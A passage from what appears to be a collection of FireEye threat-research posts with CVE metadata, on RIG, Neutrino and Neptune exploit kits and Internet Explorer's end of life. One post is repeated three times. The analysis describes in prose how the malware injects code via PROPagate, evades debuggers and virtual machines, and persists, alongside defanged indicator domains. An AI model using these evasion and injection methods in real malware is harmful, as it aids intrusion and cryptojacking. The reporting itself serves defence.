[CVE-2015-2419](<https://www.fireeye.com/blog/threat-research/2015/08/cve-2015-2419_inte.html>) which utilizes a vulnerability in JSON.stringify. This script obfuscates the call to JSON.stringify by storing pieces of the exploit in the variables shown in Figure 6.\n\n \nFigure 6: Obfuscation using variables\n\nUsing these variables, the JavaScript calls JSON.stringify with malformed parameters in order to trigger CVE-2015-2419 which in turn will cause native code execution, as shown in Figure 7.\n\n \nFigure 7: Call to JSON.Stringify\n\n#### JavaScript 3\n\nThe third JavaScript has code that adds additional JavaScript, similar to the second JavaScript. This additional JavaScript adds a flash object that exploits [CVE-2018-4878](<https://www.fireeye.com/blog/threat-research/2018/02/attacks-leveraging-adobe-zero-day.html>), as shown in Figure 8.\n\n \nFigure 8: JavaScript 3 code snippet\n\nOnce the exploitation is successful, the shellcode invokes a command line to create a JavaScript file with filename u32.tmp, as shown in Figure 9.\n\n \nFigure 9: WScript command line\n\nThis JavaScript file is launched using WScript, which downloads the next-stage payload and executes it using the command line in Figure 10.\n\n \nFigure 10: Malicious command line\n\n#### Payload Analysis\n\nFor this attack, the actor has used multiple payloads and anti-analysis techniques to bypass the analysis environment. Figure 11 shows the complete malware activity flow chart.\n\n \nFigure 11: Malware activity flow chart\n\n#### Analysis of NSIS Loader (SmokeLoader)\n\nThe first payload dropped by the RIG EK is a compiled NSIS executable famously known as SmokeLoader. Apart from NSIS files, the payload has two components: a DLL, and a data file (named \u2018kumar.dll\u2019 and \u2018abaram.dat\u2019 in our analysis case). The DLL has an export function that is invoked by the NSIS executable. This export function has code to read and decrypt the data file, which yields the second stage payload (a portable executable file).\n\nThe DLL then spawns itself (dropper) in SUSPENDED_MODE and injects the decrypted PE using process hollowing.\n\n#### Analysis of Injected Code (Second Stage Payload)\n\nThe second stage payload is a highly obfuscated executable. It consists of a routine that decrypts a chunk of code, executes it, and re-encrypts it.\n\nAt the entry point, the executable contains code that checks the OS major version, which it extracts from the Process Environment Block (PEB). If the OS version value is less than 6 (prior to Windows Vista), the executable terminates itself. It also contains code that checks whether the executable is in debugged mode, which it extracts from offset 0x2 of the PEB. If the _BeingDebugged_ flag is set, the executable terminates itself.\n\nThe malware also implements an Anti-VM check by opening the registry key **HKLM\\SYSTEM\\ControlSet001\\Services\\Disk\\Enum** with value 0.\n\nIt checks whether the registry value data contains any of the strings: vmware, virtual, qemu, or xen. Each of these strings is indictative of virtual machines\n\nAfter running the anti-analysis and environment check, the malware starts executing the core code to perform the malicious activity.\n\nThe malware uses the [PROPagate injection method](<http://www.hexacorn.com/blog/2017/10/26/propagate-a-new-code-injection-trick/>) to inject and execute the code in a targeted process. The PROPagate method is similar to the SetWindowLong injection technique. In this method, the malware uses the SetPropA function to modify the callback for UxSubclassInfo and cause the remote process to execute the malicious code.\n\nThis code injection technique only works for a process with lesser or equal integrity level. The malware first checks whether the integrity of the current running process is medium integrity level (2000, SECURITY_MANDATORY_MEDIUM_RID). Figure 12 shows the code snippet.\n\n \nFigure 12: Checking integrity level of current process\n\nIf the process is higher than medium integrity level, then the malware proceeds further. If the process is lower than medium integrity level, the malware respawns itself with medium integrity.\n\nThe malware creates a file mapping object and writes the dropper file path to it and the same mapping object is accessed by injected code, to read the dropper file path and delete the dropper file. The name of the mapping object is derived from the volume serial number of the system drive and a XOR operation with the hardcoded value (Figure 13).\n\n_File Mapping Object Name = \u201cVolume Serial Number\u201d + \u201cVolume Serial Number\u201d XOR 0x7E766791_\n\n \nFigure 13: Creating file mapping object name\n\nThe malware then decrypts the third stage payload using XOR and decompresses it with RTLDecompressBuffer. The third stage payload is also a PE executable, but the author has modified the header of the file to avoid it being detected as a PE file in memory scanning. After modifying several header fields at the start of decrypted data, we can get the proper executable header (Figure 14).\n\n \nFigure 14: Injected executable without header (left), and with header (right)\n\nAfter decrypting the payload, the malware targets the shell process, explorer.exe, for malicious code injection. It uses GetShellWindow and GetWindowThreadProcessId APIs to get the shell window\u2019s thread ID (Figure 15).\n\n \nFigure 15: Getting shell window thread ID\n\nThe malware injects and maps the decrypted PE in a remote process (explorer.exe). It also injects shellcode that is configured as a callback function in SetPropA.\n\nAfter injecting the payload into the target process, it uses EnumChild and EnumProps functions to enumerate all entries in the property list of the shell window and compares it with UxSubclassInfo\n\nAfter finding the UxSubclassInfo property of the shell window, it saves the handle info and uses it to set the callback function through SetPropA.\n\nSetPropA has three arguments, the third of which is data. The callback procedure address is stored at the offset 0x14 from the beginning of data. Malware modifies the callback address with the injected shellcode address (Figure 16).\n\n \nFigure 16: Modifying callback function\n\nThe malware then sends a specific message to the window to execute the callback procedure corresponding to the UxSubclassInfo property, which leads to the execution of the shellcode.\n\nThe shellcode contains code to execute the address of the entry point of the injected third stage payload using CreateThread. It then resets the callback for SetPropA, which was modified by malware during PROPagate injection. Figure 17 shows the code snippet of the injected shellcode.\n\n \nFigure 17: Assembly view of injected shellcode\n\n#### Analysis of Third Stage Payload\n\nBefore executing the malicious code, the malware performs anti-analysis checks to make sure no analysis tool is running in the system. It creates two infinitely running threads that contain code to implement anti-analysis checks.\n\nThe first thread enumerates the processes using CreateToolhelp32Snapshot and checks for the process names generally used in analysis. It generates a DWORD hash value from the process name using a custom operation and compares it with the array of hardcoded DWORD values. If the generated value matches any value in the array, it terminates the corresponding process.\n\nThe second thread enumerates the windows using EnumWindows. It uses GetClassNameA function to extract the class name associated with the corresponding window. Like the first thread, it generates a DWORD hash value from the class name using a custom operation and compares it with the array of hardcoded DWORD values. If the generated value matches any value in the array, it terminates the process related to the corresponding window.\n\nOther than these two anti-analysis techniques, it also has code to check the internet connectivity by trying to reach the URL: www.msftncsi[.]com/ncsi.txt.\n\nTo remain persistent in the system, the malware installs a scheduled task and a shortcut file in %startup% folder. The scheduled task is named \u201cOpera Scheduled Autoupdate {Decimal Value of GetTickCount()}\u201d.\n\nThe malware then communicates with the malicious URL to download the final payload, which is a Monero miner. It creates a MD5 hash value using Microsoft CryptoAPIs from the computer name and the volume information and sends the hash to the server in a POST request. Figure 18 shows the network communication.\n\n \nFigure 18: Network communication\n\nThe malware then downloads the final payload, the Monero miner, from the server and installs it in the system.\n\n#### Conclusion\n\nAlthough we have been observing a decline in Exploit Kit activity, attackers are not abandoning them altogether. In this blog post, we explored how RIG EK is being used with various exploits to compromise endpoints. We have also shown how the NSIS Loader leverages the lesser known PROPagate process injection technique, possibly in an attempt to evade security products.\n\nFireEye MVX and the FireEye Endpoint Security (HX) platform detect this attack at several stages of the attack chain.\n\n#### Acknowledgement\n\nWe would like to thank Sudeep Singh and Alex Berry for their contributions to this blog post.\n", "edition": 2, "cvss3": {}, "published": "2018-06-28T12:00:00", "type": "fireeye", "title": "RIG Exploit Kit Delivering Monero Miner Via PROPagate Injection Technique", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8174", "CVE-2018-4878", "CVE-2016-0189", "CVE-2015-2419"], "modified": "2018-06-28T12:00:00", "id": "FIREEYE:622FA05F62A3EDD3379557F635579EFB", "href": "https://www.fireeye.com/blog/threat-research/2018/06/rig-ek-delivering-monero-miner-via-propagate-injection-technique.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T16:24:18", "description": "Microsoft has started the year with an [announcement](<https://www.microsoft.com/en-us/WindowsForBusiness/End-of-IE-support>) that, effective Jan. 12, 2016, support for all older versions of Internet Explorer (IE) will come to an end (known as an EoL, or End of Life). The affected versions are Internet Explorer 7, 8, 9, and 10.\n\nWhat this means for users is that Microsoft will no longer release new security updates for these product versions going forward. This gives users two options: Internet Explorer 11 and Microsoft Edge, the latter of which is currently exclusive to Windows 10. If users would like to keep their browsers up to date, they will need to upgrade to either of these two options.\n\nIt should go without saying that Internet Explorer users are strongly encouraged to update to the latest version. It offers improved security with the latest security features and mitigations. Two notable mitigations introduced to the browser in 2014 are Isolated Heap and Memory Protect, which were implemented on Patch Tuesday of June and July 2014 respectively. Prior to that, Microsoft made a similar announcement about the Windows XP Operating System, wherein they issued an End of Life for XP in April 2014.\n\nThese are all steps in right direction for the Microsoft teams because it allows for the consolidation of team efforts, resulting in a stronger focus on securing fewer versions across a smaller code base. Microsoft continues to silently enhance protections as the months go by while at the same time trimming code.\n\nFigure 1 shows the vulnerability counts for Internet Explorer versions in 2015.\n\n\n\nFigure 1. Internet Explorer vulnerability count for 2015 [1]\n\nThe graph above shows the total number of reported vulnerabilities affecting each version of Internet Explorer across the months of 2015. Keeping in mind that these are non-unique counts, we can observe that, for the most part, the majority of the reported vulnerabilities affected Internet Explorer 11.\n\nFigure 2 shows the most notable in the wild (ITW) attacks exploiting Internet Explorer in 2014 and 2015.\n\nYear\n\n| \n\nCVE\n\n| \n\nAffects \n \n---|---|--- \n \n2014\n\n| \n\n[CVE-2014-0322](<http://www.fireeye.com/blog/uncategorized/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html>)\n\n| \n\nIE 9 and 10 \n \n2014\n\n| \n\n[CVE-2014-1776](<http://www.fireeye.com/blog/uncategorized/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html>)\n\n| \n\nIE 6 to 11 \n \n2015\n\n| \n\n[CVE-2015-2419](<https://www.fireeye.com/blog/threat-research/2015/08/cve-2015-2419_inte.html>)\n\n| \n\nIE 10 and 11 \n \n2015\n\n| \n\n[CVE-2015-2502](<http://krebsonsecurity.com/2015/08/microsoft-pushes-emergency-patch-for-ie/>)\n\n| \n\nIE 7 to 11 \n \nFigure 2. ITW attacks of Internet Explorer [1]\n\nThe majority of the attacks found ITW in 2014 and 2015 affected IE 11.\n\nFigure 3 compares the count of vulnerabilities that affect Internet Explorer 11 (IE 11) to the ones that don\u2019t.\n\n\n\nFigure 3. IE11 vs. Non-IE11 vulnerability count [1]\n\nBased on the information found in Figures 1, 2, and 3, most of the vulnerabilities reported in 2015 affected Internet Explorer 11. This shows that attackers, as well as researchers, are focusing considerably on Internet Explorer 11. Microsoft\u2019s most recent move will allow the company to do the same.\n\nIt should be noted that, as of Internet Explorer 11, some features are no longer supported or are considered deprecated. These include, but are not limited to, [VML](<https://msdn.microsoft.com/en-us/library/hh801223\\(v=vs.85\\).aspx>) and [VBScript](<https://msdn.microsoft.com/en-us/library/dn384057\\(v=vs.85\\).aspx>), which have been used to [exploit](<http://www.vupen.com/blog/20130522.Advanced_Exploitation_of_IE10_Windows8_Pwn2Own_2013.php>) and [compromise](<https://technet.microsoft.com/en-us/library/security/ms14-064.aspx>) the integrity of Internet Explorer, or leveraged to bypass ASLR/DEP in the past. This is a strong move in the right direction, as trimming the code base leads to shrinking the attack surface. This helps secure products such as Internet Explorer.\n\nIt is also worth noting that at this point no ITW attacks have been observed against Microsoft Edge, the new web browser that currently ships exclusively with Windows 10. Microsoft Edge also follows the same approach of removing unnecessary features such as ActiveX and Browser Helper Objects, as well as [others](<https://blogs.windows.com/msedgedev/2015/05/06/a-break-from-the-past-part-2-saying-goodbye-to-activex-vbscript-attachevent/>).\n\nIn conclusion, after Jan. 12, 2016, older Internet Explorer users will be exposed to vulnerabilities that may be exploited by malware and targeted by Exploit Kits. The best way to defend against this is to keep your browser up to date by upgrading to Internet Explorer 11 or using Microsoft Edge.\n\n[1] Microsoft Security Bulletins: <https://technet.microsoft.com/en-us/library/security/dn610807.aspx>\n", "edition": 2, "cvss3": {}, "published": "2016-01-12T14:49:00", "type": "fireeye", "title": "End of Life for Internet Explorer 8, 9 and 10", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0322", "CVE-2015-2502", "CVE-2015-2419", "CVE-2014-1776"], "modified": "2016-01-12T14:49:00", "id": "FIREEYE:7D8237F41EA87865A58B16DF63389DAA", "href": "https://www.fireeye.com/blog/threat-research/2016/01/end_of_life_for_ie.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-11-04T00:25:29", "description": "A security researcher recently published [source code](<https://github.com/theori-io/cve-2016-0189>) for a working exploit for CVE-2016-0189 and the Neutrino Exploit Kit (EK) quickly adopted it.\n\nCVE-2016-0189 was originally exploited as a zero-day vulnerability in [targeted attacks in Asia](<http://www.symantec.com/connect/blogs/internet-explorer-zero-day-exploit-used-targeted-attacks-south-korea>). The vulnerability resides within scripting engines in Microsoft\u2019s Internet Explorer (IE) browser, and is exploited to achieve Remote Code Execution (RCE). According to the researcher\u2019s repository, the open source exploit affects IE on at least Windows 10. It is possible that attackers could use or repurpose the attack for earlier versions of Windows.\n\nMicrosoft patched [CVE-2016-0189 in May on Patch Tuesday](<https://technet.microsoft.com/en-us/library/security/ms16-may.aspx>). Applying this patch will protect a system from this exploit.\n\n##### Attack Details \n\n\nThe popular Neutrino EK was quick to adopt this exploit. Neutrino works by embedding multiple exploits into one Shockwave Flash (SWF) file. Once run, the SWF profiles the victim\u2019s system \u2013 shown in Figure 1 \u2013 to determine which of its embedded exploits to use.\n\n\n\nFigure 1. Neutrino EK SWF profiles a victim\n\nNext, it decrypts and runs the applicable exploit, as shown in Figure 2. This is different from most other EKs, in which an earlier HTML/JavaScript stage profiles the browser and selectively downloads exploits from the server.\n\n\n\nFigure 2. Decrypt and embed the selected exploit into an iframe\n\nIn this example, Neutrino embedded exploits for five vulnerabilities that have been patched since May or earlier: three for Adobe Flash Player (CVE-2016-4117, CVE-2016-1019, CVE-2015-8651) and two for Internet Explorer (CVE-2016-0189, CVE-2014-6332). CVE-2016-0189 is the newest addition to Neutrino\u2019s arsenal.\n\n##### CVE-2016-0189\n\nThis CVE-2016-0189 vulnerability stems from a failure to put a lock on an array before working on it. This omission can lead to an issue when the array is changed while another function is in the middle of working on it. Memory corruption can occur if the \u201cvalueOf \u201c property of the array is set to a script function that changes the array size, as shown in Figure 3.\n\n\n\nFigure 3. Neutrino setting triggering conditions\n\nAfter Microsoft released the patch, a security researcher compared the original and patched programs to identify the root cause of the vulnerability and create a fully functioning exploit. The exploit embedded within Neutrino is identical to this researcher\u2019s exploit, except for the code that runs after initial control.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-14T20:37:00", "type": "fireeye", "title": "Exploit Kits Quickly Adopt Exploit Thanks to Open Source Release", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332", "CVE-2015-8651", "CVE-2016-0189", "CVE-2016-1019", "CVE-2016-4117"], "modified": "2016-07-14T20:37:00", "id": "FIREEYE:FAB9D3AA433B8323FF6FA7ABC6AD4069", "href": "https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-03-07T16:24:19", "description": "A security researcher recently published [source code](<https://github.com/theori-io/cve-2016-0189>) for a working exploit for CVE-2016-0189 and the Neutrino Exploit Kit (EK) quickly adopted it.\n\nCVE-2016-0189 was originally exploited as a zero-day vulnerability in [targeted attacks in Asia](<http://www.symantec.com/connect/blogs/internet-explorer-zero-day-exploit-used-targeted-attacks-south-korea>). The vulnerability resides within scripting engines in Microsoft\u2019s Internet Explorer (IE) browser, and is exploited to achieve Remote Code Execution (RCE). According to the researcher\u2019s repository, the open source exploit affects IE on at least Windows 10. It is possible that attackers could use or repurpose the attack for earlier versions of Windows.\n\nMicrosoft patched [CVE-2016-0189 in May on Patch Tuesday](<https://technet.microsoft.com/en-us/library/security/ms16-may.aspx>). Applying this patch will protect a system from this exploit.\n\n##### Attack Details \n\n\nThe popular Neutrino EK was quick to adopt this exploit. Neutrino works by embedding multiple exploits into one Shockwave Flash (SWF) file. Once run, the SWF profiles the victim\u2019s system \u2013 shown in Figure 1 \u2013 to determine which of its embedded exploits to use.\n\n\n\nFigure 1. Neutrino EK SWF profiles a victim\n\nNext, it decrypts and runs the applicable exploit, as shown in Figure 2. This is different from most other EKs, in which an earlier HTML/JavaScript stage profiles the browser and selectively downloads exploits from the server.\n\n\n\nFigure 2. Decrypt and embed the selected exploit into an iframe\n\nIn this example, Neutrino embedded exploits for five vulnerabilities that have been patched since May or earlier: three for Adobe Flash Player (CVE-2016-4117, CVE-2016-1019, CVE-2015-8651) and two for Internet Explorer (CVE-2016-0189, CVE-2014-6332). CVE-2016-0189 is the newest addition to Neutrino\u2019s arsenal.\n\n##### CVE-2016-0189\n\nThis CVE-2016-0189 vulnerability stems from a failure to put a lock on an array before working on it. This omission can lead to an issue when the array is changed while another function is in the middle of working on it. Memory corruption can occur if the \u201cvalueOf \u201c property of the array is set to a script function that changes the array size, as shown in Figure 3.\n\n\n\nFigure 3. Neutrino setting triggering conditions\n\nAfter Microsoft released the patch, a security researcher compared the original and patched programs to identify the root cause of the vulnerability and create a fully functioning exploit. The exploit embedded within Neutrino is identical to this researcher\u2019s exploit, except for the code that runs after initial control.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-14T16:37:00", "type": "fireeye", "title": "Exploit Kits Quickly Adopt Exploit Thanks to Open Source Release", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1019", "CVE-2014-6332", "CVE-2016-0189", "CVE-2016-4117", "CVE-2015-8651"], "modified": "2016-07-14T16:37:00", "id": "FIREEYE:94FA42F08227BCEDB46BD7010CC3A45D", "href": "https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-17T14:44:04", "description": "A security researcher recently published [source code](<https://github.com/theori-io/cve-2016-0189>) for a working exploit for CVE-2016-0189 and the Neutrino Exploit Kit (EK) quickly adopted it.\n\nCVE-2016-0189 was originally exploited as a zero-day vulnerability in [targeted attacks in Asia](<http://www.symantec.com/connect/blogs/internet-explorer-zero-day-exploit-used-targeted-attacks-south-korea>). The vulnerability resides within scripting engines in Microsoft\u2019s Internet Explorer (IE) browser, and is exploited to achieve Remote Code Execution (RCE). According to the researcher\u2019s repository, the open source exploit affects IE on at least Windows 10. It is possible that attackers could use or repurpose the attack for earlier versions of Windows.\n\nMicrosoft patched [CVE-2016-0189 in May on Patch Tuesday](<https://technet.microsoft.com/en-us/library/security/ms16-may.aspx>). Applying this patch will protect a system from this exploit.\n\n##### Attack Details \n\n\nThe popular Neutrino EK was quick to adopt this exploit. Neutrino works by embedding multiple exploits into one Shockwave Flash (SWF) file. Once run, the SWF profiles the victim\u2019s system \u2013 shown in Figure 1 \u2013 to determine which of its embedded exploits to use.\n\n\n\nFigure 1. Neutrino EK SWF profiles a victim\n\nNext, it decrypts and runs the applicable exploit, as shown in Figure 2. This is different from most other EKs, in which an earlier HTML/JavaScript stage profiles the browser and selectively downloads exploits from the server.\n\n\n\nFigure 2. Decrypt and embed the selected exploit into an iframe\n\nIn this example, Neutrino embedded exploits for five vulnerabilities that have been patched since May or earlier: three for Adobe Flash Player (CVE-2016-4117, CVE-2016-1019, CVE-2015-8651) and two for Internet Explorer (CVE-2016-0189, CVE-2014-6332). CVE-2016-0189 is the newest addition to Neutrino\u2019s arsenal.\n\n##### CVE-2016-0189\n\nThis CVE-2016-0189 vulnerability stems from a failure to put a lock on an array before working on it. This omission can lead to an issue when the array is changed while another function is in the middle of working on it. Memory corruption can occur if the \u201cvalueOf \u201c property of the array is set to a script function that changes the array size, as shown in Figure 3.\n\n\n\nFigure 3. Neutrino setting triggering conditions\n\nAfter Microsoft released the patch, a security researcher compared the original and patched programs to identify the root cause of the vulnerability and create a fully functioning exploit. The exploit embedded within Neutrino is identical to this researcher\u2019s exploit, except for the code that runs after initial control.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-14T16:37:00", "type": "fireeye", "title": "Exploit Kits Quickly Adopt Exploit Thanks to Open Source Release", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1019", "CVE-2014-6332", "CVE-2016-0189", "CVE-2016-4117", "CVE-2015-8651"], "modified": "2016-07-14T16:37:00", "id": "FIREEYE:0A49354849202DA95FE69EEC5811E6DD", "href": "https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-11-04T00:25:01", "description": "Exploit kit (EK) activity has been on the decline ever since [Angler Exploit Kit was shut down](<https://securityintelligence.com/news/say-goodbye-to-the-angler-exploit-kit/>) in 2016. [Fewer people using Internet Explorer](<https://threatpost.com/exploit-kit-activity-quiets-but-is-far-from-silent/124461/>) and a [drop in browser support for Adobe Flash](<https://blog.mozilla.org/futurereleases/2016/07/20/reducing-adobe-flash-usage-in-firefox/>) \u2013 two primary targets of many exploit kits \u2013 have also contributed to this decline. Additionally, some popular redirect campaigns using [PseudoDarkleech and EITest Gate to Rig Exploit Kit](<http://www.darkreading.com/attacks-breaches/rig-exploit-kit-takedown-sheds-light-on-domain-shadowing/d/d-id/1329085>) were shut down in first half of this year.\n\nDespite all this, [malvertising campaigns involving exploits kits](<https://www.fireeye.com/blog/threat-research/2017/03/still_getting_served.html>) remain active. The Neptune Exploit Kit (or Terror EK), which initially started as a Sundown EK copycat operation, has relied heavily on malvertisements. Early use of this exploit kit saw domains with very similar patterns dropping cryptocurrency miners through malvertisements:\n\n * networkmarketingpro3[.]us\n * networkmarketingpro2[.]us\n * onlinesalesproaffiliate1[.]us\n * onlinesalesproaffiliate2[.]us\n * onlinesalesproaffiliate3[.]us\n * onlinesalesproaffiliate4[.]us\n * onlinesalesproaffiliate5[.]us\n * onlinesalesproaffiliate6[.]us\n\nPayloads spread by Neptune Exploit Kit have since diversified. Recently, we have seen changes in Neptune EK\u2019s URI patterns, landing pages, malvertisement campaigns and login account details associated with the cryptocurrency mining payloads. \n\n#### Propagation\n\nSince July 16, our Dynamic Threat Intelligence (DTI) has observed changes in URI patterns for Neptune Exploit Kit. At the time of writing, the new campaign abuses a legitimate popup ad service (within Alexa\u2019s top 100) with redirects to ads about hiking clubs, as shown in Figure 1.\n\n \nFigure 1: Fake ad for a hiking club leading to Neptune EK\n\nRedirects from domains associated with these ads eventually use 302 redirects to move victims to exploit kit landing pages. Fake domains involved in these redirects imitate real domains. For example, highspirittreks[.]club shown in Figure 1 spoofs highspirittreks[.]com. Other hiking fake ads use similarly spoofed legitimate site names with .club domains. Figure 2 shows a redirect from a fake site\u2019s pop-up.\n\n \nFigure 2: Silent redirect to EK landing page\n\nFireEye Dynamic Threat Intelligence (DTI) stats show the regions being affected by this campaign (Figure 3). \n\n \nFigure 3: Regions affected by the malvertisement campaign, as observed from customer data\n\nA few instances of the redirect involve flvto[.]download (mimicking the legitimate www.flvto[.]biz) instead of hiking club fake ads. Figure 4 and Figure 5 show the legitimate domain and fake domain, respectively, for comparison\u2019s sake.\n\n \nFigure 4: Real page, flvto[.]biz (Alexa rank 2,674)\n\n \nFigure 5: Fake page, flvto[.]download\n\nMost of the ads linked to this campaign have been observed on high-traffic torrent and multimedia hosting sites.\n\nSites are hosted on IP **95.85.62.226**. Reverse lookup for this IP shows:\n\n * 2watchmygf[.]stream\n * flvto[.]download\n * highspirittreks[.]club\n * treknepal[.]club\n\nOther hosted IPs and domains of the same campaign are in the Indicators of Compromise section at the end of the post. All IPs point to locations in Amsterdam.\n\nSince July 16, related EK infrastructure has been hosted on domains protected by Whois Guard. However, in recent activity, domains are linked to the Registrant email: \u2018gabendollar399@gmx[.]com\u2019. \n\nThe following domains are currently associated with this email:\n\n**Domain Name**\n\n| \n\n**Create Date**\n\n| \n\n**Registrar** \n \n---|---|--- \n \n[itsmebecauseyoua[.]pw](<https://whois.domaintools.com/itsmebecauseyoua.pw>)\n\n| \n\n2017-03-05\n\n| \n\n\\-- \n \n[loansforevery[.]us](<https://whois.domaintools.com/loansforevery.us>)\n\n| \n\n2017-04-14\n\n| \n\n1 HOST RUSSIA, INC \n \n[managetheworld[.]us](<https://whois.domaintools.com/managetheworld.us>)\n\n| \n\n2017-04-14\n\n| \n\n1 HOST RUSSIA, INC \n \n[nudecams[.]us](<https://whois.domaintools.com/nudecams.us>)\n\n| \n\n2017-04-14\n\n| \n\n1 HOST RUSSIA, INC \n \n#### Exploits/Landing Page\n\nThe landing page for the Neptune Exploit Kit redirects to further HTML and Adobe Flash exploit links after it checks the Flash versions installed on the victim\u2019s machine (see Figure 6).\n\n \nFigure 6: Landing page of Neptune EK\n\nThis EK exploits multiple vulnerabilities in one run. Most of these exploits are well-known and commonly seen in other exploit kits.\n\nCurrently, Neptune EK uses three Internet Explorer exploits and two Flash exploits:\n\n * [CVE-2016-0189](<https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html>) \u2013 Internet Explorer\n * [CVE-2015-2419](<https://www.fireeye.com/blog/threat-research/2015/08/cve-2015-2419_inte.html>) \u2013 Internet Explorer\n * [CVE-2014-6332](<https://technet.microsoft.com/en-us/library/security/ms14-064.aspx>) \u2013 Internet Explorer\n * [CVE-2015-8651](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8651>) \u2013 Adobe Flash Player\n * [CVE-2015-7645](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7645>) \u2013 Adobe Flash Player\n\n#### Payload (Monero miner)\n\nThe payload is dropped as a plain executable from one of the URI\u2019s belonging to the EK domain (same as the landing page). Figure 7 shows a typical response header for these cases.\n\n \nFigure 7: Response header for Monero miner payload\n\nPost infection traffic shows an attempt to connect to minergate[.]com (Figure 8) and a login attempt using the cpu-miner service via the login email monsterkill20@mail[.]com (Figure 9). Login attempts are invoked via the command line:\n\n\n\n \nFigure 8: DNS query to minergate[.]com\n\n \nFigure 9: Login attempt\n\n#### Conclusion\n\nDespite an observable decline in exploit kit activity, users are still at risk, especially if they have outdated or unpatched software. This threat is especially 